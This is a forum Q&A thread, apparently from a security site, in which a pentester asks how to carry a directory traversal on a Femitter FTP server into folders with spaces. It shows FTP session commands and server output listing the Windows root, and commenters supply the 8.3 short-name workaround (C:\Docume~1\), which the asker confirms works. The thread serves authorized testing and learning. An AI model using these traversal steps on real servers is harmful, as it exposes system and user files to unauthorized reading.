15
4
I am conducting a sanctioned pentest in a closed reference environment, and struggled upon a seemingly simple issue, I currently cannot solve.
When attempting to execute a directory traversal attack against a vulnerable Fermitter FTP server running on MS Windows OS, it is possible to do a LIST on system root (addresses and content listings changed here for reference only):
# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root):
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 0 Sep 23 2015 AUTOEXEC.BAT
-rw-rw-rw- 1 ftp ftp 0 Sep 23 2015 CONFIG.SYS
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 Documents and Settings
dr--r--r-- 1 ftp ftp 0 Sep 23 2015 Program Files
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 WINDOWS
226 File sent ok
However, if I want to list the contents of a folder containing white spaces such as Documents and settings
, I am not able to list the directory contents because of whites spaces being ignored.
ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
I already tried using different FTP clients (CLI and GUI, on Linux and Windows) and either they ignore white spaces or disallow directory traversal.
Also tried scripting the attack on Python by using at first raw sockets and then ftplib to send the commands in HEX format directly to the FTP server, but with no success.
Googling for couple of hours did not yield a working solution (yes, there were a lot of options, which did not work), that is why there is someone here, who has had the same issue. Pretty sure, that this is not the first time such a directory traversal with white spaces is needed.
Case sensitivity looks to be irrelevant for the FTP clients. At least the GNU/Linux FTP client lists directories ignoring the letter case. – None – 2016-02-23T18:38:34.280
@lockout: case sensitivity is a server side thing and not a client thing. The clients lists the data the same way the server sends it and does not change the case. – Steffen Ullrich – 2016-02-23T18:46:01.450
@Steffen Ullrich: Thanks! This server is not case sensitive. And case sensitivity actually is not an issue here, but the white spaces, which terminate the directory traversal are. – None – 2016-02-23T18:50:52.130
@tim: thanks! The FTP server banner, as seen in the listing, is Femitter FTP server, and not the native Windows FTP service. It could be, but I doubt it, that this issue is limited to this server edition only. – None – 2016-02-23T18:54:32.693
1Also give C:\Docume~1\ a try. – Dog eat cat world – 2016-02-23T22:15:19.527
1Try escaping the spaces with
\
or quoting the directory string – DavidPostill – 2016-02-23T22:34:21.250@Dog eat cat world: Whoa, you are right about that notation! I had forgotten about that one. Will give that one a try now, and report back. – lockout – 2016-02-24T07:25:19.893
@DavidPostill: Thanks! The option you mentioned, besides some more white-space escape approaches, was already tried initially. You can see that in the listing above. – lockout – 2016-02-24T07:33:19.740
@Dogeatcatworld: Your suggestion worked! The Windows folder short notation
C:\Docume~1\
had dropped out from my head completely! I will update the post with the solution. Could you please submit your answer also so that I can mark that one as a working solution? Thanks again – lockout – 2016-02-24T07:36:58.100Hold you horses guys! :) I am a total newcomer to this forum, and I will post the solution promptly. Just thought it would be better if the user who suggested working solution would add it to get proper credit. All calm down... thanks! – lockout – 2016-02-24T07:55:10.310
1I am happy it worked for you @lockout. Since you have gone through the trouble of answering your question, it is fine by me that you accept it as the answer. Thanks for crediting me. – Dog eat cat world – 2016-02-24T11:24:07.603